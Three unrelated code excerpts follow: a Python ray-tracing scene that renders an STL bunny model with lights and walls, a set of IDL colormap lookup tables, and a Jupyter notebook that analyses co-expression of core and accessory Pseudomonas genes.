my_mesh.translate([settings['translate'][0], settings['translate'][1], settings['translate'][2]])
if 'rot_axis' in settings and settings['rot_axis'] is not None:
rot_axis = settings['rot_axis']
rot_rads = settings['rot_rads']
my_mesh.rotate(rot_axis, rot_rads)
stl_mesh = STLMesh(my_mesh, object_matl, name="mesh_1")
print(f'stl_mesh {stl_filename} -- bbox={stl_mesh.bounding_box(None, None)}, num_triangles={stl_mesh.num_triangles}')
world.add(stl_mesh)
if True:
# if True: # use plane vs triangles
if False:
plane_1 = Plane.plane_from_point_and_normal(pt=Vec3(0, -1, 0), normal=Vec3(0, 1, 0), material=ground_matl)
world.add(plane_1)
else:
plane_x = settings['plane_x']
plane_y = settings['plane_y']
back_plane_z = settings['back_plane_z']
front_plane_z = settings['front_plane_z']
v0 = Vec3(-plane_x, plane_y, front_plane_z)
uv0 = (0,0)
v1 = Vec3(-plane_x ,plane_y,back_plane_z)
uv1 = (0, 1)
v2 = Vec3(plane_x, plane_y, front_plane_z)
uv2 = (1, 0)
v3 = Vec3(plane_x, plane_y,back_plane_z)
uv3 = (1, 1)
triangle = Triangle(v0, v1, v2, ground_matl, uv0, uv1, uv2)
world.add(triangle)
triangle = Triangle(v1, v2, v3, ground_matl, uv1, uv2, uv3)
world.add(triangle)
ambient = Vec3(0.6,0.6,0.6)
background = SolidColor(Vec3(0.5, 0.7, 1.0))
geom = Disc(center=Vec3(3,10,-3), normal=Vec3(0,-1,0), radius=1.5, material=SolidColor(Vec3(0.7, 0.7, 0.7)))
if settings and 'SAMPLES_PER_LIGHT' in settings:
samples = settings['SAMPLES_PER_LIGHT']
else:
samples = 25
# light_1 = PointLight(pos=Vec3(-10.0, 100, 80), color=Vec3(0.2, 0.3, 0.2))
light_1 = PointLight(pos=Vec3(-10.0, 100, 80), color=Vec3(0.6, 0.6, 0.6))
light_2 = AreaLight(geom=geom, color=Vec3(0.6, 0.6, 0.6), num_samples=samples)
# lights = [light_1]
lights = [light_2]
# lights = [light_1, light_2]
scene = Scene(world, ambient=ambient, lights=lights, background=background)
# camera = Camera(look_from=Vec3(8.5, 4, 0), look_at=Vec3(0, 1, 0), vup=Vec3(0, 1, 0), vert_fov=25)
camera = Camera(look_from=settings['look_from'], look_at=settings['look_at'], vup=Vec3(0, 1, 0), vert_fov=25)
return {'scene': scene, 'camera': camera}
def create_stl_mesh(settings=None):
"""
TODO:
scale the model
"""
silver = SolidColor(Vec3(0.7, 0.7, 0.7))
green = SolidColor(Vec3(0.1, 0.5, 0.1))
blue = SolidColor(Vec3(0.1, 0.1, 0.5))
red = SolidColor(Vec3(0.5, 0.2, 0.2))
purple = SolidColor(Vec3(0.4, 0.1, 0.4))
gray = SolidColor(Vec3(0.2, 0.2, 0.2))
med_gray = SolidColor(Vec3(0.4, 0.4, 0.4))
light_gray = SolidColor(Vec3(0.9, 0.9, 0.9))
dark_gray = SolidColor(Vec3(0.1, 0.1, 0.1))
black = SolidColor(Vec3(0.0, 0.0, 0.0))
# rotated by 90 deg on the X axis... bbox=AABB(vmin=(-48.551, 5.275, -45.792), vmax=(59.196, 113.167, 42.010)), num_triangles=112402
stl_filename = "models/Bunny.stl"
settings = {'look_from': Vec3(0.0, 100, 350), 'look_at': Vec3(0, 50.0, 0),
'plane_x': 120, 'plane_y': 5.275, 'back_plane_z': -85, 'front_plane_z': 350,
'rot_axis': [1,0,0], 'rot_rads': math.pi/2, 'translate': [-25, 0, 0], 'show_walls': True}
image_2 = Image.open(Path("./textures/IO_logo.png"))
logo = ImageTexture(image_2) # images are across the entire checkerboard, not a single square?
checked = CheckerBoard(dark_gray, light_gray, spacing=0.1)
diffuse_red = Lambertian(red, name="red'")
diffuse_blue = Lambertian(blue, name="blue'")
diffuse_gray = Lambertian(gray, name="gray'")
diffuse_med_gray = Lambertian(med_gray, name="med_gray'")
diffuse_light_gray = Lambertian(light_gray, name="light_gray'")
metal_1 = Metal(silver, name="metal_1")
logo_matl = Lambertian(logo, name="logo")
# dielectric_1 = Dielectric(1.5, name="dielectric_1")
checkerboard = Lambertian(checked, name="gray'")
dielectric = Dielectric(1.0, "dielectric")
# object_matl = metal_1
# object_matl = diffuse_gray
object_matl = diffuse_light_gray
# object_matl = dielectric
ground_matl = diffuse_gray
# ground_matl = checkerboard
# ground_matl = logo_matl
# right_wall_matl = diffuse_red
# right_wall_matl = metal_1
right_wall_matl = diffuse_light_gray
# left_wall_matl = diffuse_blue
# left_wall_matl = metal_1
left_wall_matl = diffuse_light_gray
# back_wall_matl = logo_matl
# back_wall_matl = metal_1
back_wall_matl = checkerboard
world = GeometryList()
if True:
plane_x = settings['plane_x']
plane_y = settings['plane_y']
back_plane_z = settings['back_plane_z']
front_plane_z = settings['front_plane_z']
if True:
# ground plane
v0 = Vec3(-plane_x, plane_y, front_plane_z)
uv0 = (0,1)
v1 = Vec3(-plane_x ,plane_y,back_plane_z)
uv1 = (0,0)
v2 = Vec3(plane_x, plane_y, front_plane_z)
uv2 = (1,1)
v3 = Vec3(plane_x, plane_y,back_plane_z)
uv3 = (1,0)
triangle = Triangle(v0, v1, v2, ground_matl, uv0, uv1, uv2)
world.add(triangle)
triangle = Triangle(v1, v2, v3, ground_matl, uv1, uv2, uv3)
world.add(triangle)
height = 2 * plane_x
if settings['show_walls'] is True:
# right wall
v0 = Vec3(plane_x, plane_y, front_plane_z)
uv0 = (1, 1)
v1 = Vec3(plane_x, plane_y, back_plane_z)
uv1 = (0, 1)
v2 = Vec3(plane_x, plane_y+height, back_plane_z)
uv2 = (0,0)
v3 = Vec3(plane_x, plane_y+height, front_plane_z)
uv3 = (1, 0)
triangle = Triangle(v0, v1, v2, right_wall_matl, uv0, uv1, uv2)
world.add(triangle)
triangle = Triangle(v0, v2, v3, right_wall_matl, uv0, uv2, uv3)
world.add(triangle)
# left wall
v0 | |
1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0]),
)
### IDL colormap 35 :: Blue Waves ###
color_map_luts['idl35'] = \
(
array([ 0.3203125, 0.3203125, 0.3007812, 0.2851562, 0.2656250, 0.2460938,
0.2304688, 0.2109375, 0.1953125, 0.1796875, 0.1640625, 0.1484375,
0.1328125, 0.1171875, 0.1015625, 0.0898438, 0.0742188, 0.0625000,
0.0507812, 0.0507812, 0.0312500, 0.0195312, 0.0117188, 0.0039062,
0.0000000, 0.0078125, 0.0117188, 0.0195312, 0.0234375, 0.0234375,
0.0273438, 0.0273438, 0.0312500, 0.0273438, 0.0273438, 0.0234375,
0.0234375, 0.0195312, 0.0117188, 0.0078125, 0.0000000, 0.0039062,
0.0117188, 0.0195312, 0.0312500, 0.0507812, 0.0507812, 0.0625000,
0.0742188, 0.0898438, 0.1015625, 0.1171875, 0.1328125, 0.1484375,
0.1640625, 0.1796875, 0.1953125, 0.2109375, 0.2304688, 0.2460938,
0.2656250, 0.2851562, 0.3007812, 0.3203125, 0.3398438, 0.3554688,
0.3750000, 0.3906250, 0.4101562, 0.4296875, 0.4453125, 0.4648438,
0.4804688, 0.4960938, 0.5117188, 0.5273438, 0.5429688, 0.5585938,
0.5742188, 0.5859375, 0.6015625, 0.6132812, 0.6250000, 0.6367188,
0.6445312, 0.6562500, 0.6640625, 0.6718750, 0.6796875, 0.6875000,
0.6914062, 0.6992188, 0.7031250, 0.7031250, 0.7070312, 0.7070312,
0.7109375, 0.7070312, 0.7070312, 0.7031250, 0.7031250, 0.6992188,
0.6914062, 0.6875000, 0.6796875, 0.6718750, 0.6640625, 0.6562500,
0.6445312, 0.6367188, 0.6250000, 0.6132812, 0.6015625, 0.5859375,
0.5742188, 0.5585938, 0.5429688, 0.5273438, 0.5117188, 0.4960938,
0.4804688, 0.4648438, 0.4453125, 0.4296875, 0.4101562, 0.3906250,
0.3750000, 0.3554688, 0.3359375, 0.3203125, 0.3007812, 0.2851562,
0.2656250, 0.2460938, 0.2304688, 0.2109375, 0.1953125, 0.1796875,
0.1640625, 0.1484375, 0.1328125, 0.1171875, 0.1015625, 0.0898438,
0.0742188, 0.0625000, 0.0507812, 0.0507812, 0.0312500, 0.0195312,
0.0117188, 0.0039062, 0.0000000, 0.0078125, 0.0117188, 0.0195312,
0.0234375, 0.0234375, 0.0273438, 0.0273438, 0.0312500, 0.0273438,
0.0273438, 0.0234375, 0.0234375, 0.0195312, 0.0117188, 0.0078125,
0.0000000, 0.0039062, 0.0117188, 0.0195312, 0.0312500, 0.0507812,
0.0507812, 0.0625000, 0.0742188, 0.0898438, 0.1015625, 0.1171875,
0.1328125, 0.1484375, 0.1640625, 0.1796875, 0.1953125, 0.2109375,
0.2304688, 0.2460938, 0.2656250, 0.2851562, 0.3007812, 0.3203125,
0.3398438, 0.3554688, 0.3750000, 0.3906250, 0.4101562, 0.4296875,
0.4453125, 0.4648438, 0.4804688, 0.4960938, 0.5117188, 0.5273438,
0.5429688, 0.5585938, 0.5742188, 0.5859375, 0.6015625, 0.6132812,
0.6250000, 0.6367188, 0.6445312, 0.6562500, 0.6640625, 0.6718750,
0.6796875, 0.6875000, 0.6914062, 0.6992188, 0.7031250, 0.7031250,
0.7070312, 0.7070312, 0.7109375, 0.7070312, 0.7070312, 0.7031250,
0.7031250, 0.6992188, 0.6914062, 0.6875000, 0.6796875, 0.6718750,
0.6640625, 0.6562500, 0.6445312, 0.6367188, 0.6250000, 0.6132812,
0.6015625, 0.5859375, 0.5742188, 0.5585938, 0.5429688, 0.5273438,
0.5117188, 0.4960938, 0.4804688, 0.4648438, 0.4453125, 0.4296875,
0.4101562, 0.3906250, 0.3750000, 0.3750000]),
array([ 0.0000000, 0.0000000, 0.0039062, 0.0039062, 0.0078125, 0.0078125,
0.0117188, 0.0156250, 0.0156250, 0.0195312, 0.0234375, 0.0234375,
0.0273438, 0.0312500, 0.0351562, 0.0507812, 0.0429688, 0.0468750,
0.0507812, 0.0585938, 0.0625000, 0.0664062, 0.0742188, 0.0781250,
0.0859375, 0.0898438, 0.0976562, 0.1054688, 0.1093750, 0.1171875,
0.1250000, 0.1328125, 0.1367188, 0.1445312, 0.1523438, 0.1601562,
0.1679688, 0.1757812, 0.1796875, 0.1875000, 0.1953125, 0.1992188,
0.2070312, 0.2148438, 0.2187500, 0.2265625, 0.2304688, 0.2343750,
0.2382812, 0.2421875, 0.2460938, 0.2500000, 0.2539062, 0.2578125,
0.2578125, 0.2617188, 0.2617188, 0.2617188, 0.2617188, 0.2617188,
0.2617188, 0.2617188, 0.2617188, 0.2578125, 0.2578125, 0.2539062,
0.2500000, 0.2500000, 0.2460938, 0.2421875, 0.2382812, 0.2343750,
0.2304688, 0.2226562, 0.2187500, 0.2148438, 0.2109375, 0.2070312,
0.2031250, 0.1992188, 0.1914062, 0.1875000, 0.1835938, 0.1835938,
0.1796875, 0.1757812, 0.1718750, 0.1718750, 0.1718750, 0.1679688,
0.1679688, 0.1679688, 0.1679688, 0.1718750, 0.1718750, 0.1757812,
0.1796875, 0.1835938, 0.1875000, 0.1953125, 0.1992188, 0.2070312,
0.2148438, 0.2226562, 0.2343750, 0.2421875, 0.2539062, 0.2656250,
0.2773438, 0.2890625, 0.3046875, 0.3164062, 0.3320312, 0.3437500,
0.3593750, 0.3750000, 0.3906250, 0.4062500, 0.4218750, 0.4375000,
0.4531250, 0.4687500, 0.4843750, 0.5000000, 0.5156250, 0.5312500,
0.5468750, 0.5625000, 0.5781250, 0.5898438, 0.6015625, 0.6171875,
0.6289062, 0.6406250, 0.6484375, 0.6601562, 0.6679688, 0.6757812,
0.6835938, 0.6875000, 0.6953125, 0.6992188, 0.7031250, 0.7031250,
0.7031250, 0.7031250, 0.7031250, 0.6992188, 0.6992188, 0.6953125,
0.6875000, 0.6835938, 0.6757812, 0.6679688, 0.6601562, 0.6484375,
0.6406250, 0.6289062, 0.6171875, 0.6054688, 0.5937500, 0.5781250,
0.5664062, 0.5507812, 0.5390625, 0.5234375, 0.5117188, 0.4960938,
0.4843750, 0.4687500, 0.4570312, 0.4414062, 0.4296875, 0.4179688,
0.4062500, 0.3945312, 0.3867188, 0.3789062, 0.3710938, 0.3632812,
0.3554688, 0.3515625, 0.3476562, 0.3437500, 0.3437500, 0.3437500,
0.3437500, 0.3437500, 0.3476562, 0.3554688, 0.3593750, 0.3671875,
0.3750000, 0.3867188, 0.3984375, 0.4101562, 0.4257812, 0.4414062,
0.4570312, 0.4765625, 0.4960938, 0.5156250, 0.5351562, 0.5546875,
0.5781250, 0.6015625, 0.6250000, 0.6484375, 0.6757812, 0.6992188,
0.7265625, 0.7500000, 0.7773438, 0.8007812, 0.8281250, 0.8515625,
0.8789062, 0.9023438, 0.9257812, 0.9492188, 0.9687500, 0.9921875,
0.9804688, 0.9609375, 0.9414062, 0.9257812, 0.9101562, 0.8945312,
0.8828125, 0.8710938, 0.8593750, 0.8515625, 0.8437500, 0.8398438,
0.8359375, 0.8320312, 0.8320312, 0.8359375, 0.8359375, 0.8437500,
0.8476562, 0.8554688, 0.8671875, 0.8750000, 0.8906250, 0.9023438,
0.9179688, 0.9335938, 0.9531250, 0.9687500, 0.9882812, 0.9804688,
0.9609375, 0.9375000, 0.9140625, 0.9140625]),
array([ 0.8359375, 0.8359375, 0.7890625, 0.7382812, 0.6914062, 0.6445312,
0.5976562, 0.5507812, 0.5039062, 0.4609375, 0.4179688, 0.3750000,
0.3320312, 0.2929688, 0.2539062, 0.2187500, 0.1835938, 0.1484375,
0.1171875, 0.0859375, 0.0585938, 0.0351562, 0.0078125, 0.0078125,
0.0273438, 0.0468750, 0.0625000, 0.0742188, 0.0859375, 0.0937500,
0.0976562, 0.1015625, 0.1054688, 0.1015625, 0.0976562, 0.0937500,
0.0859375, 0.0742188, 0.0625000, 0.0468750, 0.0273438, 0.0078125,
0.0078125, 0.0351562, 0.0585938, 0.0859375, 0.1171875, 0.1484375,
0.1835938, 0.2187500, 0.2539062, 0.2929688, 0.3320312, 0.3750000,
0.4179688, 0.4609375, 0.5039062, 0.5507812, 0.5976562, 0.6445312,
0.6914062, 0.7382812, 0.7890625, 0.8359375, 0.8867188, 0.9335938,
0.9804688, 0.9609375, 0.9140625, 0.8671875, 0.8203125, 0.7734375,
0.7265625, 0.6835938, 0.6406250, 0.5976562, 0.5546875, 0.5156250,
0.4765625, 0.4414062, 0.4062500, 0.3710938, 0.3398438, 0.3085938,
0.2812500, 0.2578125, 0.2304688, 0.2109375, 0.1914062, 0.1718750,
0.1562500, 0.1445312, 0.1328125, 0.1250000, 0.1210938, 0.1171875,
0.1132812, 0.1171875, 0.1210938, 0.1250000, 0.1328125, 0.1445312,
0.1562500, 0.1718750, 0.1914062, 0.2109375, 0.2304688, 0.2578125,
0.2812500, 0.3085938, 0.3398438, 0.3710938, 0.4062500, 0.4414062,
0.4765625, 0.5156250, 0.5546875, 0.5976562, 0.6406250, 0.6835938,
0.7265625, 0.7734375, 0.8203125, 0.8671875, 0.9140625, 0.9609375,
0.9804688, 0.9335938, 0.8828125, 0.8359375, 0.7890625, 0.7382812,
0.6914062, 0.6445312, 0.5976562, 0.5507812, 0.5039062, 0.4609375,
0.4179688, 0.3750000, 0.3320312, 0.2929688, 0.2539062, 0.2187500,
0.1835938, 0.1484375, 0.1171875, 0.0859375, 0.0585938, 0.0351562,
0.0078125, 0.0078125, 0.0273438, 0.0468750, 0.0625000, 0.0742188,
0.0859375, 0.0937500, 0.0976562, 0.1015625, 0.1054688, 0.1015625,
0.0976562, 0.0937500, 0.0859375, 0.0742188, 0.0625000, 0.0468750,
0.0273438, 0.0078125, 0.0078125, 0.0351562, 0.0585938, 0.0859375,
0.1171875, 0.1484375, 0.1835938, 0.2187500, 0.2539062, 0.2929688,
0.3320312, 0.3750000, 0.4179688, 0.4609375, 0.5039062, 0.5507812,
0.5976562, 0.6445312, 0.6914062, 0.7382812, 0.7890625, 0.8359375,
0.8867188, 0.9335938, 0.9804688, 0.9609375, 0.9140625, 0.8671875,
0.8203125, 0.7734375, 0.7265625, 0.6835938, 0.6406250, 0.5976562,
0.5546875, 0.5156250, 0.4765625, 0.4414062, 0.4062500, 0.3710938,
0.3398438, 0.3085938, 0.2812500, 0.2578125, 0.2304688, 0.2109375,
0.1914062, 0.1718750, 0.1562500, 0.1445312, 0.1328125, 0.1250000,
0.1210938, 0.1171875, 0.1132812, 0.1171875, 0.1210938, 0.1250000,
0.1328125, 0.1445312, 0.1562500, 0.1718750, 0.1914062, 0.2109375,
0.2304688, 0.2578125, 0.2812500, 0.3085938, 0.3398438, 0.3710938,
0.4062500, 0.4414062, 0.4765625, 0.5156250, 0.5546875, 0.5976562,
0.6406250, 0.6835938, 0.7265625, 0.7734375, 0.8203125, 0.8671875,
0.9140625, 0.9609375, 0.9804688, 0.9804688]),
array([ 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0]),
)
### IDL colormap 36 :: Volcano ###
color_map_luts['idl36'] = \
(
array([ 0.2500000, 0.2500000, 0.2343750, 0.2226562, 0.2109375, 0.1992188,
0.1875000, 0.1757812, 0.1640625, 0.1562500, 0.1445312, 0.1367188,
0.1250000, 0.1171875, | |
# coding: utf-8
# # Explore highly co-expressed genes
# In the previous [notebook](2_explore_corr_of_genes.ipynb) we observed that using 39 samples with 201 PAO1-specific genes, that the correlation of accessory-accessory genes is higher compared to the correlation of core-core and core-accessory genes.
#
# Based on this finding, we want to know: *What can explain this difference in correlation distribution?*
#
# This notebook performs a follow-up analysis. In particular this notebook performs a deeper examination of the correlation structure per group (core-core, core-accessory, accessory-accessory) by looking at the trends of the nearest neighbors (i.e. highly correlated genes) of each gene.
# In[74]:
import pandas as pd
import os
import pickle
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from functions import calculations
np.random.seed(123)
# In[75]:
# Input
base_dir = os.path.abspath(os.path.join(os.getcwd(),"../"))
base_intermediate_dir = os.path.join(
base_dir,
"pilot_experiment",
"data",
"tmp")
core_gene_ids_file = os.path.join(
base_intermediate_dir,
"core_gene_ids.pickle")
acc_gene_ids_file = os.path.join(
base_intermediate_dir,
"acc_gene_ids.pickle")
real_all_corr_file = os.path.join(
base_intermediate_dir,
"real_all_corr.pickle")
shuffled_all_corr_file = os.path.join(
base_intermediate_dir,
"shuffled_all_corr.pickle")
# Import Pseudomonas operon annotations from ADAGE repo
# Original source of data is from DOOR
# https://github.com/greenelab/adage/blob/master/Genome_organization/operon_3.txt
# Operons containing at least 3 genes
operon_file = "https://github.com/greenelab/adage/blob/master/Genome_organization/operon_3.txt"
# In[76]:
# Read in gene ids
core_gene_ids = pickle.load(open(core_gene_ids_file, "rb"))
acc_gene_ids = pickle.load(open(acc_gene_ids_file, "rb"))
# Get number of core and accessory genes
num_core_genes = len(core_gene_ids)
num_acc_genes = len(acc_gene_ids)
num_all_genes = num_core_genes + num_acc_genes
# # Extract statistics about co-expression from correlation matrix
# In[77]:
# Define threshold for highly co-expressed genes
coexpression_threshold = 0.9
# ### Co-expression statsitics using real data
# In[78]:
# Get co-expression patterns using real expression data
real_core_df, real_acc_df = calculations.get_coexpression_stats(real_all_corr_file,
operon_file,
core_gene_ids_file,
acc_gene_ids_file,
coexpression_threshold)
# In[79]:
real_core_df.head()
# In[80]:
real_acc_df.head()
# ### Co-expression statistics using shuffled data
# In[81]:
# Get co-expression patterns using shuffled expression data (control)
shuffled_core_df, shuffled_acc_df = calculations.get_coexpression_stats(shuffled_all_corr_file,
operon_file,
core_gene_ids_file,
acc_gene_ids_file,
coexpression_threshold)
shuffled_core_df.head()
# In[82]:
shuffled_acc_df.head()
# # Plot trends in co-expression data
# ## 1. Number of co-expressed genes
# In[83]:
sns.set()
# ### Number of co-expressed genes
# In[84]:
# Get bins using all data
hist, bins_num_coexpressed_real = np.histogram(np.concatenate([real_core_df['num_coexpressed_genes'].values,
real_acc_df['num_coexpressed_genes'].values]))
# Distribution of number of co-expressed genes in real data
# Set up the matplotlib figure
fig, axes = plt.subplots(ncols=2, nrows=1)
sns.distplot(real_core_df['num_coexpressed_genes'].tolist(),
label='core',
color='red',
kde=False,
bins=bins_num_coexpressed_real,
ax=axes[0])
sns.distplot(real_acc_df['num_coexpressed_genes'].tolist(),
label='accessory',
color='blue',
kde=False,
bins=bins_num_coexpressed_real,
ax=axes[1])
plt.suptitle('Number of co-expressed genes (real data, threshold={})'.format(coexpression_threshold))
axes[0].legend(prop={'size': 12})
axes[1].legend(prop={'size': 12})
fig.text(0.5, 0.01, 'Number of co-expressed genes', ha='center')
axes[0].set_ylabel('Counts')
# ### Number of nonzero co-expressed genes
# In[85]:
## Remove genes with 0 co-expressed genes
# Get bins using all data
hist, bins_num_coexpressed_real_nonzero = np.histogram(np.concatenate(
[real_core_df[real_core_df['num_coexpressed_genes']>0]['num_coexpressed_genes'].values,
real_acc_df[real_acc_df['num_coexpressed_genes']>0]['num_coexpressed_genes'].values]))
# Set up the matplotlib figure
fig, axes = plt.subplots(ncols=2, nrows=1)
# Distribution of number of co-expressed genes in real data
sns.distplot(real_core_df[real_core_df['num_coexpressed_genes']>0]['num_coexpressed_genes'].tolist(),
label='core',
color='red',
kde=False,
bins=bins_num_coexpressed_real_nonzero,
ax=axes[0])
sns.distplot(real_acc_df[real_acc_df['num_coexpressed_genes']>0]['num_coexpressed_genes'].tolist(),
label='accessory',
color='blue',
kde=False,
bins=bins_num_coexpressed_real_nonzero,
ax=axes[1])
plt.suptitle('Number of nonzero co-expressed genes (real data, threshold={})'.format(coexpression_threshold))
axes[0].legend(prop={'size': 12})
axes[1].legend(prop={'size': 12})
fig.text(0.5, 0.01, 'Number of co-expressed genes', ha='center')
axes[0].set_ylabel('Counts')
# In[86]:
# Get bins using all data
hist, bins_num_coexpressed_shuffled = np.histogram(np.concatenate([shuffled_core_df['num_coexpressed_genes'].values,
shuffled_acc_df['num_coexpressed_genes'].values]))
# Set up the matplotlib figure
fig, axes = plt.subplots(ncols=2, nrows=1)
# Distribution of number of co-expressed genes in shuffled data
sns.distplot(shuffled_core_df['num_coexpressed_genes'].tolist(),
label='core',
color='red',
kde=False,
bins=bins_num_coexpressed_shuffled,
ax=axes[0])
sns.distplot(shuffled_acc_df['num_coexpressed_genes'].tolist(),
label='accessory',
color='blue',
kde=False,
bins=bins_num_coexpressed_shuffled,
ax=axes[1]
)
plt.suptitle('Number of co-expressed genes (shuffled data, threshold={})'.format(coexpression_threshold))
axes[0].legend(prop={'size': 12})
axes[1].legend(prop={'size': 12})
fig.text(0.5, 0.01, 'Number of co-expressed genes', ha='center')
axes[0].set_ylabel('Counts')
# In[87]:
# Print statistics about co-expressed genes
print('Using a threshold of {} to define co-expression (real data): \n'.
format(coexpression_threshold))
print('- For a given CORE gene, there is a median of {} co-expressed genes'.
format(np.median(real_core_df['num_coexpressed_genes'])))
print('- For a given ACCESSORY gene, there is a median of {} co-expressed genes \n'.
format(np.median(real_acc_df['num_coexpressed_genes'])))
# For shuffled data
print('Using a threshold of {} to define co-expression (shuffled data): \n'.
format(coexpression_threshold))
print('- For a given CORE gene, there is a median of {} co-expressed genes'.
format(np.median(shuffled_core_df['num_coexpressed_genes'])))
print('- For a given ACCESSORY gene, there is a median of {} co-expressed genes'.
format(np.median(shuffled_acc_df['num_coexpressed_genes'])))
# **Overall:**
# * Many core and accessory genes are not co-expressed with other genes or very few genes, as expected
# * As increase threshold (more stringent), there are fewer co-expressed genes, as expected
# * (control, not shown) All genes (threshold=0.75,0.9) are connected to just 1 gene, as expected, since we have destroyed relationships between genes when we shuffled
# * Both core and accessory genes are have the same degree of connectivity
#
# **Observation using All experiments:**
# * At a threshold of 0.5, core genes have a median of 716 genes they are connect to and accessory genes have a median of 601 genes they are connected to
# * At a threshold of 0.75 core genes have a median of 53 genes they are connect to and accessory genes have a median of 74 genes they are connected to
# * At a threshold of 0.9, core and accessory genes have a median of 1 gene that they are connected to
#
# **Observation using only PAO1 experiments:**
# * At a threshold of 0.5, core genes have a median of 1331 genes they are connect to and accessory genes have a median of 1341 genes they are connected to. So there are more connections using only PAO1 genes, which we would expect since the accessory genes are PAO1-specific.
# * At a threshold of 0.75 core genes have a median of 554 genes they are connect to and accessory genes have a median of 576 genes they are connected to
# * At a threshold of 0.9, core genes have a median of 21 gene that they are connected to and accessory genes have a median of 57 genes they are connected to
#
# **Observation using only PA14 experiments:**
# * At a threshold of 0.5, core genes have a median of 1133 genes they are connect to and accessory genes have a median of 1065 genes they are connected to. So there are more connections using only PAO1 genes, which we would expect since the accessory genes are PAO1-specific.
# * At a threshold of 0.75 core genes have a median of 153 genes they are connect to and accessory genes have a median of 132 genes they are connected to
# * At a threshold of 0.9, core genes have a median of 2 gene that they are connected to and accessory genes have a median of 3 genes they are connected to
# ### Compare co-expressed vs not co-expressed genes
# What is the difference between genes that are co-expressed vs those that are not?
# In[15]:
# Get genes that are co-expressed with other genes
coexpressed_core_genes = list(real_core_df[real_core_df['num_coexpressed_genes']>0].index)
coexpressed_acc_genes = list(real_acc_df[real_acc_df['num_coexpressed_genes']>0].index)
# In[16]:
len(coexpressed_core_genes)
# In[17]:
len(coexpressed_acc_genes)
# At a strict threshold of 0.9, all genes are co-expressed with **at least** one other gene. So there are no independent genes.
# ## 2. Percent of co-expressed genes that are NOT in the same operon
# In[15]:
